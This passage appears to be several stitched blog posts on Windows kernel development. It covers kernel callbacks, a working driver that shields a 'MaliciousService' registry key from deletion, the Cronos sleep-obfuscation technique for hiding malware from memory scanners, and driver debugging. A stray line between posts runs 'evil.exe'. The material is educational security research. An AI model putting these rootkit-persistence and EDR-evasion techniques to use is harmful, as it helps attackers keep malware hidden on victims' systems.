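constexpr AccessMask kProcessTerminate = 0x0001; // same value as PROCESS_TERMINATE
constexpr AccessMask kProcessVmRead = 0x0010;    // same value as PROCESS_VM_READ

// Hypothetical, simplified view of what a pre-operation callback sees.
struct FakePreOperationInfo {
    std::uint32_t targetPid;
    AccessMask desiredAccess;
};

// Removes the terminate right from handles opened to the protected process
// and leaves every other request untouched.
void StripTerminate(FakePreOperationInfo& info, std::uint32_t protectedPid) {
    if (info.targetPid == protectedPid)
        info.desiredAccess &= ~kProcessTerminate;
}
```

The handle is still created, so the caller does not see a failure when opening the process; it only discovers the missing right when it tries to use it.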

As you can see, these kinds of operations are very useful for both rootkits and AVs/EDRs to protect their user mode component. Usually, if you have a user mode part you will want to use some of these callbacks to make sure your process/thread is protected properly and cannot be killed easily.

PsSet*NotifyRoutine

Unlike ObRegisterCallbacks, the PsSet*NotifyRoutine functions are not responsible for handle opening or duplicating operations but for monitoring creation/killing and loading operations. The most notable ones are PsSetCreateProcessNotifyRoutine, PsSetCreateThreadNotifyRoutine and PsSetLoadImageNotifyRoutine, and all of them are heavily used by AVs/EDRs to monitor for certain process/thread creations and DLL loading. Let’s break it down and talk about each function separately and what you can do with it.

PsSetCreateProcessNotifyRoutine receives a function of type PCREATE_PROCESS_NOTIFY_ROUTINE which looks like so:

void PcreateProcessNotifyRoutine(
  [in] HANDLE ParentId,
  [in] HANDLE ProcessId,
  [in] BOOLEAN Create
)

ParentId is the PID of the parent process of the target process. ProcessId is the PID of the target process. Create indicates whether the process is being created (TRUE) or is exiting (FALSE).

The most common example of using this kind of routine is to watch certain processes and if there is an attempt to create a forbidden process (e.g. create a cmd directly under Winlogon), you can kill it. Another example can be of creating a “watchdog” for a certain process and if it is killed by an unauthorized process, restart it.

PsSetCreateThreadNotifyRoutine receives a function of type PCREATE_THREAD_NOTIFY_ROUTINE which looks like so:

void PcreateThreadNotifyRoutine(
  [in] HANDLE ProcessId,
  [in] HANDLE ThreadId,
  [in] BOOLEAN Create
)

ProcessId is the PID of the process. ThreadId is the TID of the target thread. Create indicates whether it is a create or kill operation.

A simple example of using this kind of routine: if an EDR injected its library into a process, it can use the routine to notice when the library’s thread is getting killed.

PsSetLoadImageNotifyRoutine receives a function of type PLOAD_IMAGE_NOTIFY_ROUTINE which looks like so:

void PloadImageNotifyRoutine(
  [in, optional] PUNICODE_STRING FullImageName,
  [in]           HANDLE ProcessId,
  [in]           PIMAGE_INFO ImageInfo
)

FullImageName is the name of the loaded image (a note here: it is not only DLLs and can be also EXE for example). ProcessId is the PID of the target process. ImageInfo is the most interesting part and contains a struct of type IMAGE_INFO:

typedef struct _IMAGE_INFO {
  union {
    ULONG Properties;
    struct {
      ULONG ImageAddressingMode : 8;
      ULONG SystemModeImage : 1;
      ULONG ImageMappedToAllPids : 1;
      ULONG ExtendedInfoPresent : 1;
      ULONG MachineTypeMismatch : 1;
      ULONG ImageSignatureLevel : 4;
      ULONG ImageSignatureType : 3;
      ULONG ImagePartialMap : 1;
      ULONG Reserved : 12;
    };
  };
  PVOID  ImageBase;
  ULONG  ImageSelector;
  SIZE_T ImageSize;
  ULONG  ImageSectionNumber;
} IMAGE_INFO, *PIMAGE_INFO;

The most important properties, in my opinion, are ImageBase and ImageSize; using these you can inspect and analyze the image pretty efficiently. A simple example is if an attacker injects a DLL into LSASS, an EDR can inspect the image and unload it if it finds it malicious. If the ExtendedInfoPresent flag is set, it means that this struct is embedded inside a larger struct of type IMAGE_INFO_EX (which can be retrieved with CONTAINING_RECORD):

typedef struct _IMAGE_INFO_EX {
  SIZE_T              Size;
  IMAGE_INFO          ImageInfo;
  struct _FILE_OBJECT *FileObject;
} IMAGE_INFO_EX, *PIMAGE_INFO_EX;

As you can see, here you also get the FILE_OBJECT, which is a pointer to the file object of the file that backs the image on the disk. With that information, you can also check for reflective DLL injection (a loaded DLL without any file backed on the disk) and it opens a door for you to monitor for more injection methods that don’t have a file on the disk.
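Getting from the IMAGE_INFO pointer to the surrounding IMAGE_INFO_EX is pointer arithmetic with the member's offset, which is what the CONTAINING_RECORD macro does. The user-mode sketch below reproduces that with simplified, hypothetical structures (FakeImageInfo and FakeImageInfoEx); the ExtendedInfoPresent mask is derived from the bit-field layout shown earlier (8 + 1 + 1 bits precede it, so it is bit 10).

```cpp
#include <cstddef>
#include <cstdint>

// Simplified, hypothetical versions of IMAGE_INFO and IMAGE_INFO_EX.
struct FakeImageInfo {
    std::uint32_t properties;
    void* imageBase;
    std::size_t imageSize;
};

struct FakeImageInfoEx {
    std::size_t size;
    FakeImageInfo imageInfo;
    void* fileObject;
};

constexpr std::uint32_t kExtendedInfoPresent = 1u << 10;

// Walks back from the embedded member to the start of the outer structure,
// but only when the flag says the outer structure actually exists.
FakeImageInfoEx* ToExtended(FakeImageInfo* info) {
    if ((info->properties & kExtendedInfoPresent) == 0)
        return nullptr;

    auto* raw = reinterpret_cast<unsigned char*>(info) - offsetof(FakeImageInfoEx, imageInfo);
    return reinterpret_cast<FakeImageInfoEx*>(raw);
}
```

Checking the flag first matters: without it, the subtraction would produce a pointer into unrelated memory.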

These kinds of functions are usually used more for EDRs and AVs rather than rootkits, because as you can see it provides insights that are more useful for monitoring rather than doing malicious operations but that doesn’t mean it doesn’t have a use at all. For example, a rootkit can use the PsSetLoadImageNotifyRoutine to make sure that no AV/EDR agent is injected into it.

CmRegisterCallbackEx

CmRegisterCallbackEx registers a registry callback that can monitor and interfere with various registry operations such as registry key creation, deletion, querying and more. Like ObRegisterCallbacks, it receives a unique altitude and the callback function. Let’s focus on the registry callback function:

NTSTATUS ExCallbackFunction(
  [in]           PVOID CallbackContext,
  [in, optional] PVOID Argument1,
  [in, optional] PVOID Argument2
)

CallbackContext is the context that was passed on the function registration with CmRegisterCallbackEx. Argument1 is a REG_NOTIFY_CLASS value that identifies which operation was made (e.g. deletion, creation, setting value) and whether it is a post-operation or pre-operation. Argument2 is a pointer to the information itself, and its type matches the class that was specified in Argument1.

Using this callback, a rootkit can do many operations, from blocking a change to a specific registry key, denying setting a specific value or hiding registry keys and values.
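The decision logic of such a callback can be sketched in user mode as a switch on the operation class followed by a path check. All names below (FakeNotifyClass, FakeRegNotify, the protected key suffix) are hypothetical stand-ins; the sketch assumes the callback receives the full key path and therefore compares the end of the path, ignoring case.

```cpp
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>

using Status = std::uint32_t;
constexpr Status kSuccess = 0x00000000;
constexpr Status kAccessDenied = 0xC0000022; // same numeric value as STATUS_ACCESS_DENIED

// Hypothetical stand-in for REG_NOTIFY_CLASS.
enum class FakeNotifyClass { PreDeleteKey, PreSetValueKey, Other };

// Case-insensitive "ends with" check for ASCII paths.
bool EndsWithIgnoreCase(const std::string& text, const std::string& suffix) {
    if (suffix.size() > text.size())
        return false;

    const std::size_t start = text.size() - suffix.size();
    for (std::size_t i = 0; i < suffix.size(); i++) {
        const int a = std::tolower(static_cast<unsigned char>(text[start + i]));
        const int b = std::tolower(static_cast<unsigned char>(suffix[i]));
        if (a != b)
            return false;
    }
    return true;
}

// Blocks deletion of the protected key and lets everything else through.
Status FakeRegNotify(FakeNotifyClass operation, const std::string& keyPath) {
    switch (operation) {
        case FakeNotifyClass::PreDeleteKey:
            if (EndsWithIgnoreCase(keyPath, "\\Services\\MaliciousService"))
                return kAccessDenied;
            return kSuccess;
        default:
            return kSuccess;
    }
}
```

Returning an error status from a pre-operation notification is what makes the registry operation fail for the caller.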

An example is a rootkit that saves its configuration in the registry and then hides it using this callback. To give another practical example, we will now create another driver: a driver that can protect registry keys from deletion.

Registry Protector

First, let’s start with the DriverEntry:

#define DRIVER_PREFIX "MyDriver: "
#define DRIVER_DEVICE_NAME L"\\Device\\MyDriver"
#define DRIVER_SYMBOLIC_LINK L"\\??\\MyDriver"
#define REG_CALLBACK_ALTITUDE L"31102.0003"

LARGE_INTEGER g_RegContext;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    NTSTATUS status = STATUS_SUCCESS;
    PDEVICE_OBJECT DeviceObject = nullptr;

    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DRIVER_DEVICE_NAME);
    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    UNICODE_STRING regAltitude = RTL_CONSTANT_STRING(REG_CALLBACK_ALTITUDE);

    // Creating device and symbolic link.
    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create device: (0x%08X)\n", status));
        return status;
    }
    
    status = IoCreateSymbolicLink(&symbolicLink, &deviceName);
    
    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create symbolic link: (0x%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    // Registering the registry callback.
    status = CmRegisterCallbackEx(RegNotify, &regAltitude, DriverObject, nullptr, &g_RegContext, nullptr);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to register registry callback: (0x%08X)\n", status));
        IoDeleteSymbolicLink(&symbolicLink);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = MyUnload;
    return status;
}

In addition to the standard DriverEntry initializations (creating the DeviceObject and the symbolic link), we called CmRegisterCallbackEx to register our RegNotify callback. Note that we saved g_RegContext as a global variable, as it will be used soon in the MyUnload function to unregister the callback when DriverUnload is called.

void MyUnload(PDRIVER_OBJECT DriverObject) {
    KdPrint((DRIVER_PREFIX "Unloading...\n"));
    NTSTATUS status = CmUnRegisterCallback(g_RegContext);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to unregister registry callbacks: (0x%08X)\n", status));
    }

    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    IoDeleteSymbolicLink(&symbolicLink);
    IoDeleteDevice(DriverObject->DeviceObject);
}

In MyUnload, we didn’t just unload the driver but also made sure to unregister our callback using the g_RegContext from before.

NTSTATUS RegNotify(PVOID context, PVOID Argument1, PVOID Argument2) {
    PCUNICODE_STRING regPath;
    UNREFERENCED_PARAMETER(context);
    NTSTATUS status = STATUS_SUCCESS;
    
    switch ((REG_NOTIFY_CLASS)(ULONG_PTR)Argument1) {
        case RegNtPreDeleteKey: {
            REG_DELETE_KEY_INFORMATION* info = static_cast<REG_DELETE_KEY_INFORMATION*>(Argument2);
            
            // To avoid BSOD.
            if (!info->Object)
                break;
            
            status = CmCallbackGetKeyObjectIDEx(&g_RegContext, info->Object, nullptr, &regPath, 0);
            
            if (!NT_SUCCESS(status))
                break;
            
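            // The returned path is in kernel format and Length is counted in bytes.
            const WCHAR protectedKey[] = LR"(\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\MaliciousService)";
            const SIZE_T protectedKeyLen = (sizeof(protectedKey) / sizeof(WCHAR)) - 1;

            if (regPath->Buffer && regPath->Length >= protectedKeyLen * sizeof(WCHAR) &&
                _wcsnicmp(protectedKey, regPath->Buffer, protectedKeyLen) == 0) {
                KdPrint((DRIVER_PREFIX "Protected the malicious service!\n"));
                status = STATUS_ACCESS_DENIED;
            }
            
            // Release the name on every path, not only when it matched.
            CmCallbackReleaseKeyObjectIDEx(regPath);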
        }
        break;
    }
    
    return status;
}

Let’s break down what we’ve done here. First, we checked the type of the operation and chose to respond only to RegNtPreDeleteKey. For this class, we know that Argument2 contains information of type REG_DELETE_KEY_INFORMATION, so we can cast to it.

After the cast, we can use the Object parameter to access the registry key itself to get the key’s path. To do that, we can use CmCallbackGetKeyObjectIDEx:

NTSTATUS CmCallbackGetKeyObjectIDEx(
  [in]            PLARGE_INTEGER   Cookie,
  [in]            PVOID            Object,
  [out, optional] PULONG_PTR       ObjectID,
  [out, optional] PCUNICODE_STRING *ObjectName,
  [in]            ULONG            Flags
);

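Cookie is our global g_RegContext variable. Object is the registry key object. ObjectID is a unique registry identifier; for our needs it can be null. *ObjectName is the output registry key path. It is returned in the kernel format (for example, it starts with \REGISTRY\MACHINE rather than HKEY_LOCAL_MACHINE), so make sure the path you compare it with uses the same format. Flags must be 0.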

Once you have the ObjectName, it is just a matter of comparing it with the key that you want to protect, and if it matches you can change the status to STATUS_ACCESS_DENIED to block the operation.
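The comparison step can be tried out in user mode. The following is a minimal sketch, not Nidhogg's implementation: KeyName is a simplified stand-in for UNICODE_STRING, and makeKeyName, lowerAscii and isProtectedKey are hypothetical helper names made up for this example. It mainly shows that the Length field is in bytes and has to be converted to characters before it is compared with a character count.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Simplified stand-in for UNICODE_STRING. Like the real one, Length is in BYTES.
struct KeyName {
    const char16_t* Buffer;
    unsigned short Length;
};

// Helper for this sketch only: wraps a std::u16string without copying it.
KeyName makeKeyName(const std::u16string& s) {
    return KeyName{ s.data(), static_cast<unsigned short>(s.size() * sizeof(char16_t)) };
}

// ASCII-only lowercase; enough for the path prefixes used in this sketch.
char16_t lowerAscii(char16_t c) {
    return (c >= u'A' && c <= u'Z') ? static_cast<char16_t>(c - u'A' + u'a') : c;
}

// Returns true when `name` starts with `protectedKey`, ignoring ASCII case.
bool isProtectedKey(const KeyName& name, const std::u16string& protectedKey) {
    // Convert the byte length to characters BEFORE comparing it to a character count.
    const std::size_t nameChars = name.Length / sizeof(char16_t);

    if (!name.Buffer || nameChars < protectedKey.size())
        return false;

    for (std::size_t i = 0; i < protectedKey.size(); i++) {
        if (lowerAscii(name.Buffer[i]) != lowerAscii(protectedKey[i]))
            return false;
    }

    return true;
}

// Usage example.
void example() {
    const std::u16string protectedKey = u"\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\MaliciousService";
    const std::u16string deleted = u"\\registry\\machine\\system\\currentcontrolset\\services\\maliciousservice";

    assert(isProtectedKey(makeKeyName(deleted), protectedKey));
}
```

Because this is a prefix comparison, subkeys of the protected key match as well, and so does any sibling key whose name merely starts with the same characters.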

You can see a full implementation of the different registry operations handling in Nidhogg’s Registry Utils.

Conclusion

In this blog, we learned about the different types of kernel callbacks and created our registry protector driver.

In the next blog, we will learn two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

timeout /t 31 && start evil.exe

6 November 2022 at 00:00

Prologue

Cronos is a new sleep obfuscation technique co-authored by @idov31 and @yxel.

It is based on 5pider’s Ekko and, like Ekko, it encrypts the process image with RC4 and evades memory scanners by also switching the memory regions’ permissions back and forth between RWX and RW.

In this blog post, we will cover Cronos specifically and sleep obfuscation techniques in general and explain why we need them and the common ground of any sleep obfuscation technique.

As always, the full code is available on GitHub and for any questions feel free to reach out on Twitter.

Sleep Obfuscation In General

To understand why sleep obfuscation is needed, we need to understand what problem it attempts to solve. Detection capabilities have evolved over the years: more and more companies are moving from AV to EDRs, as they provide more advanced detection capabilities and attempt to find even the attackers that are hardest to find. Besides that, investigators also have better tools like pe-sieve, which finds injected DLLs, hollowed processes and shellcodes, and that is a major problem for any attacker that attempts to hide their malware.

To solve this issue, people came up with sleep obfuscation techniques, and all of them share one basic idea: as long as the current piece of malware (whether it is a DLL, EXE or shellcode) isn’t doing any important “work” (for example, an agent that doesn’t have any task from the C2, or a backdoor that just checks in once in a while), it should be encrypted. Once people realized that, they came up with techniques that encrypt the process image and decrypt it when it needs to be activated.

One of the very first techniques I got to know is Gargoyle, which is an amazing technique for marking a process as non-executable and using a ROP chain to make it executable again. This worked great until scanners began to adapt and started looking at non-executable memory regions as well. But in this game of cops and thieves, the attackers adapted again and started using a single-byte XOR to encrypt the malicious part or the whole image; an example of this is SleepyCrypt. SleepyCrypt not only adds encryption but also supports x64 binaries (the original Gargoyle supports only x86, but Waldo-IRC created an x64 version of Gargoyle). But, you guessed it, memory scanners found a solution to that as well by brute-forcing single-byte XOR on memory regions.
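To see why a single-byte XOR doesn't hold up for long, here is a minimal sketch of the brute force a scanner could run. It is an illustration only and not how any particular scanner works: xorWithKey and bruteForceXorKey are hypothetical names, and the "signature" is simply the well-known DOS stub string of a PE file.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

// XOR every byte with the same key; applying it twice restores the input.
Bytes xorWithKey(const Bytes& data, std::uint8_t key) {
    Bytes out(data);
    for (auto& b : out)
        b = static_cast<std::uint8_t>(b ^ key);
    return out;
}

// True when `needle` appears somewhere in `haystack` after XOR-ing it with `key`.
bool containsAfterXor(const Bytes& haystack, const std::string& needle, std::uint8_t key) {
    if (needle.empty() || haystack.size() < needle.size())
        return false;

    for (std::size_t start = 0; start + needle.size() <= haystack.size(); start++) {
        std::size_t i = 0;
        while (i < needle.size() &&
               static_cast<std::uint8_t>(haystack[start + i] ^ key) == static_cast<std::uint8_t>(needle[i]))
            i++;
        if (i == needle.size())
            return true;
    }
    return false;
}

// Tries all 256 keys; returns the first key that reveals the signature, or -1.
int bruteForceXorKey(const Bytes& region, const std::string& signature) {
    for (int key = 0; key < 256; key++) {
        if (containsAfterXor(region, signature, static_cast<std::uint8_t>(key)))
            return key;
    }
    return -1;
}

// Usage example: "hide" a fake image with key 0x5A and recover the key.
void example() {
    const std::string signature = "This program cannot be run in DOS mode";
    const std::string image = "MZ" + signature;
    const Bytes hidden = xorWithKey(Bytes(image.begin(), image.end()), 0x5A);

    assert(bruteForceXorKey(hidden, signature) == 0x5A);
}
```

With only 256 possible keys, the whole key space is checked almost instantly, which is why the later techniques moved to heavier encryption.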

Now that we have the background and understand WHY sleep obfuscations exist let’s understand what has changed and what sleep obfuscation techniques we have nowadays.

Modern Sleep Obfuscations

Today (speaking in 2022) we have memory scanners that can brute force single-byte XOR encryption and detect malicious programs even when they do not have any executable rights. So what can be done next?

The answer starts to become clearer in Foliage, which uses not only heavier obfuscation than single-byte XOR but also a neat trick to trigger the ROP chain to change the memory regions’ permission using NtContinue and context.

Later on, Ekko came out and added 2 important features: One of them is to RC4 encrypt the process image using an undocumented function SystemFunction032, and the other one is to address and fix the soft spot of every sleep technique so far: Stabilize the ROP using a small and very meaningful change to the RSP register.

To conclude the modern sleep obfuscation section we will also talk about DeathSleep, a technique that kills the current thread after saving its CPU state and stack and then restores them. DeathSleep also helped a lot during the creation of Cronos.

Now it is clear where we are heading with this: combining all the knowledge we have accumulated so far to create Cronos.

Cronos

The main logic of Cronos is pretty simple:

  1. Change the image’s protection to RW.

  2. Encrypt the image.

  3. Decrypt the image.

  4. Add execution privileges to the image.

To achieve this we need to do several things: find a function to encrypt the image with, choose which kind of timer to use and, most importantly, find a way to execute code when the image is decrypted.

Finding an encryption function was easy: SystemFunction032 was an obvious choice since it is widely used (also in Ekko) and is documented by Benjamin Delpy in his article and in many other places.

One may ask, “Why use a function that can serve as a strong IoC when you can do custom or XOR encryption?” The honest answer is that it is much easier to use it in the ROP chain later on (spoiler alert) than to implement strong and good encryption ourselves.
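To make the encryption step more concrete, here is a minimal sketch of RC4 in plain C++. It does not call SystemFunction032 and is not Cronos's code; the names rc4 and toBytes are made up for this example. It only illustrates the property the technique relies on: RC4 is symmetric, so running the same function with the same key a second time restores the original bytes.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

// Plain RC4: key scheduling (KSA) followed by keystream generation (PRGA).
// Encryption and decryption are the same operation.
Bytes rc4(const Bytes& key, const Bytes& data) {
    assert(!key.empty());

    std::uint8_t S[256];
    for (int i = 0; i < 256; i++)
        S[i] = static_cast<std::uint8_t>(i);

    // KSA: shuffle the state according to the key.
    std::uint8_t j = 0;
    for (int i = 0; i < 256; i++) {
        j = static_cast<std::uint8_t>(j + S[i] + key[i % key.size()]);
        std::swap(S[i], S[j]);
    }

    // PRGA: XOR every data byte with the next keystream byte.
    Bytes out(data.size());
    std::uint8_t x = 0;
    std::uint8_t y = 0;
    for (std::size_t n = 0; n < data.size(); n++) {
        x = static_cast<std::uint8_t>(x + 1);
        y = static_cast<std::uint8_t>(y + S[x]);
        std::swap(S[x], S[y]);
        const std::uint8_t k = S[static_cast<std::uint8_t>(S[x] + S[y])];
        out[n] = static_cast<std::uint8_t>(data[n] ^ k);
    }
    return out;
}

// Helper for this sketch only.
Bytes toBytes(const std::string& s) {
    return Bytes(s.begin(), s.end());
}

// Usage example: "encrypt before sleeping, decrypt after waking up".
void example() {
    const Bytes key = toBytes("0123456789ABCDEF");
    const Bytes image = toBytes("pretend this is the process image");

    const Bytes sleeping = rc4(key, image);  // encrypted while idle
    assert(sleeping != image);
    assert(rc4(key, sleeping) == image);     // same call decrypts it
}
```

Because the same call both encrypts and decrypts, the same function can serve both stages, which fits the point above about keeping things simple for the ROP chain.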

Now that we have an encryption function, we need timers that can execute an APC function of our choosing. For that, I chose waitable timers because they are well-documented, easy and stable to use and easy to trigger - all that needs to be done is to call any alertable sleep function (e.g. SleepEx).

All we have left to do is find a way to execute an APC that will trigger the sleeping function. The problem is that the code has to run regardless of the image’s state (whether it has executable rights, whether it is encrypted, etc.), and the obvious solution is to use a ROP chain that executes the sleep to trigger the APC.

For the final stage, we used the NtContinue trick from Foliage to execute the different stages of sleep obfuscation (RW -> Encrypt -> Decrypt -> RWX).

Conclusion

This was a fun project to make, and we were able to make it thanks to the amazing projects mentioned here; every single one of them provided another piece that got us where we are.

I hope that you enjoyed the blog and would love to hear what you think about it!

Lord Of The Ring0 - Part 3 | Sailing to the land of the user (and debugging the ship)

30 October 2022 at 00:00

Prologue

In the last blog post, we understood what a callback routine is, how to get basic information from user mode and, for the finale, created a driver that can block access to a certain process. In this blog, we will dive into some of the most important things there are when it comes to driver development: how to debug correctly, how to create good user-mode communication and what lessons I learned during the development of Nidhogg so far.

This time, there will be no hands-on code writing but something more important - how to solve and understand the problems that pop up when you develop kernel drivers.

Debugging

The way I see it, there are 3 approaches when it comes to debugging a kernel: the good, the great and the hacky (of course, you can combine any or all of them). I’ll start by explaining each of them, with its benefits and downsides.

  • The good: This method is for anyone because it doesn’t require many resources and is very effective. All you need to do is set the VM where you test your driver to produce a crash dump (you can leave the crash dump option on automatic) and make sure that the “Disable automatic deletion of memory dumps when disk space is low” setting is checked, or you may find yourself very confused when the crash dump isn’t there when it should have been generated. Then, all you have to do is drag the crash dump back to your computer and analyze it. The con of this method is that sometimes you will see corrupted data and values without knowing how they got there, but most of the time you will get a lot of information that can be very helpful in tracing back the source of the problem.

  • The great: This method is for those who have a good computer setup, because not everyone can run it smoothly. To debug your VM I recommend following these instructions. Then, all you have to do is put breakpoints in the right spots and do the kind of debugging we all love to hate but that gives the best results, as you can track and see everything in real time. The con of this method is that it requires a lot of resources from the computer, and not everyone (me included) has enough resources to open Visual Studio, run a VM and remote debug it with WinDBG.

  • The hacky: I highly recommend not using this method alone. Like in every type of program, you can print debugging messages with KdPrint, set up the VM to enable debugging messages and fire up DbgView to see them. If you are printing a string value, make sure to lower the IRQL like so:

KIRQL prevIrql = KeGetCurrentIrql();
KeLowerIrql(PASSIVE_LEVEL);
KdPrint(("Print your string %ws.\n", myString));
KeRaiseIrql(prevIrql, &prevIrql);

Because it lets you see the values of the current variables it is very useful, just not when you did something that causes the machine to crash. That’s why I recommend combining it with either the crash dump option or the debugging option.

I won’t write a guide here on how to use WinDBG because there are many great guides out there, but I will add a word about it. The commands that help me the most when trying to understand what’s wrong are:

  • !analyze -v: It makes WinDBG load the symbols and shows the error code and, most importantly, the line in your source code that led to the BSOD.

  • lm: This command shows you all the loaded modules at the time of the crash and allows you to iterate them, their functions, etc.

  • uf /D <address>: This command shows you the disassembly of a specific address, so you can examine it.

Now that we know the basics of how to debug a driver, let’s dive into the main event: how to properly exchange data with the user mode.

Talking with the user-mode 102

Last time we understood the different methods to send and get data from user mode, the basic usage of IOCTLs and what IRPs are. But what happens when we want to send a list of different variables? What happens if we want to send a file name, process name or something that isn’t just a number?

DISCLAIMER: As I said before, in this series I’ll be using the IOCTL method, so we will address the problem using this method.

To properly send data we can use the handy and trusty struct. What you need to do is define a data structure, in both your user application and your kernel driver, for what you are planning to send, for example:

struct MyItem {
    int type;
    int price;
    WCHAR* ItemsName;
};

And send it through the DeviceIoControl:

DeviceIoControl(hFile, IOCTL_DEMO,
        &myItem, sizeof(myItem),
        &myItem, sizeof(myItem), &returned, nullptr);

But all of this we knew before, so what is new? As you noticed, I sent myItem twice and the reason is in the definition of DeviceIoControl:

BOOL DeviceIoControl(
  [in]                HANDLE       hDevice,
  [in]                DWORD        dwIoControlCode,
  [in, optional]      LPVOID       lpInBuffer,
  [in]                DWORD        nInBufferSize,
  [out, optional]     LPVOID       lpOutBuffer,
  [in]                DWORD        nOutBufferSize,
  [out, optional]     LPDWORD      lpBytesReturned,
  [in, out, optional] LPOVERLAPPED lpOverlapped
);

We can define the IOCTL in a way that will allow the driver to both receive data and send data, all we have to do is to define our IOCTL with the method type METHOD_BUFFERED like so:

#define IOCTL_DEMO CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

And now, SystemBuffer is accessible for both writing and reading.

A quick reminder: SystemBuffer is the way we can access the user data, and is accessible to us through the IRP like so:

Irp->AssociatedIrp.SystemBuffer;

Now that we can access it, several questions remain: How can I write data to it without causing a BSOD? How can I verify that I get the type that I want? What if I want to send or receive a list of items and not just one?

The second question is easy to answer and was already shown in the previous blog post:

auto size = stack->Parameters.DeviceIoControl.InputBufferLength;

if (size == 0 || size % sizeof(MyItem) != 0) {
    status = STATUS_INVALID_BUFFER_SIZE;
    break;
}

This is a simple yet effective test, but it isn’t enough. That is why we also need to verify every value we want to use:

...
auto data = (MyItem*)Irp->AssociatedIrp.SystemBuffer;

if (data->type < 0 || !data->ItemsName || data->price < 0) {
    status = STATUS_INVALID_PARAMETER;
    break;
}
...

This is just an example of the checks that need to be done when accessing user-mode data; everything that comes from or returns to the user should be handled with extreme caution.
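The two layers of checks (buffer size first, then every field) can be sketched in portable C++ as follows. This is an assumption-heavy illustration, not driver code: the Status enum and the validateItems and isValidName functions are made up for the example, and MyItem is changed to carry its name inline in a fixed-size array. With METHOD_BUFFERED only the buffer itself is copied, so a pointer inside the struct would still point at user-mode memory.

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical variant of MyItem with the name stored inline (assumption of this sketch).
struct MyItem {
    int type;
    int price;
    char16_t ItemsName[32];
};

// Stand-ins for the NTSTATUS values used in the post.
enum class Status { Success, InvalidBufferSize, InvalidParameter };

// True when the name is non-empty and terminated inside its own array.
bool isValidName(const char16_t (&name)[32]) {
    if (name[0] == u'\0')
        return false;

    for (char16_t c : name) {
        if (c == u'\0')
            return true;
    }
    return false;
}

// Validates a buffer that is expected to hold one or more MyItem entries.
Status validateItems(const void* buffer, std::size_t length) {
    // Layer 1: the size must be a non-zero multiple of the item size.
    if (!buffer || length == 0 || length % sizeof(MyItem) != 0)
        return Status::InvalidBufferSize;

    const MyItem* items = static_cast<const MyItem*>(buffer);
    const std::size_t count = length / sizeof(MyItem);

    // Layer 2: every field of every item is checked before it is used.
    for (std::size_t i = 0; i < count; i++) {
        if (items[i].type < 0 || items[i].price < 0 || !isValidName(items[i].ItemsName))
            return Status::InvalidParameter;
    }
    return Status::Success;
}

// Usage example.
void example() {
    MyItem items[2] = {
        { 1, 10, u"sword" },
        { 2, 25, u"shield" },
    };

    assert(validateItems(items, sizeof(items)) == Status::Success);
    assert(validateItems(items, sizeof(items) - 1) == Status::InvalidBufferSize);
}
```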

Writing data back to the user is fairly easy, just like in user mode. The hard part comes when you want to return a list of items but don’t want to create an entirely new structure just for it. Microsoft themselves solved this in a pretty strange-looking yet effective way that you can see in several WinAPIs (for example, when iterating processes or modules), and there are two approaches:

The first one is sending each item separately and sending null when the list ends. The second one is sending the number of items first and then sending the items one by one. I prefer the second method (and you can also see it implemented in Nidhogg) but you can do whatever works for you.
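One possible way to picture the "count first" approach is a single buffer that starts with the number of items and is followed by the items themselves. The sketch below is only one variation under my own assumptions (the Item struct, writeItemList and readItemList are hypothetical names, and Nidhogg may lay things out differently); the important part is that the reader never trusts the count without checking it against the real buffer size.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical item type for this sketch.
struct Item {
    std::uint32_t id;
    std::uint32_t value;
};

// Writes [count][item 0][item 1]... into `out`.
// Returns the number of bytes written, or 0 when the buffer is too small.
std::size_t writeItemList(const std::vector<Item>& items, void* out, std::size_t outSize) {
    const std::uint32_t count = static_cast<std::uint32_t>(items.size());
    const std::size_t needed = sizeof(count) + items.size() * sizeof(Item);

    if (!out || outSize < needed)
        return 0;

    unsigned char* cursor = static_cast<unsigned char*>(out);
    std::memcpy(cursor, &count, sizeof(count));

    if (!items.empty())
        std::memcpy(cursor + sizeof(count), items.data(), items.size() * sizeof(Item));

    return needed;
}

// Reads the list back. Returns false when the count does not fit the buffer.
bool readItemList(const void* in, std::size_t inSize, std::vector<Item>& items) {
    if (!in || inSize < sizeof(std::uint32_t))
        return false;

    const unsigned char* cursor = static_cast<const unsigned char*>(in);
    std::uint32_t count = 0;
    std::memcpy(&count, cursor, sizeof(count));

    // Never trust the count: compare it with what the buffer can really hold.
    if (count > (inSize - sizeof(count)) / sizeof(Item))
        return false;

    items.resize(count);
    if (count != 0)
        std::memcpy(items.data(), cursor + sizeof(count), count * sizeof(Item));

    return true;
}

// Usage example.
void example() {
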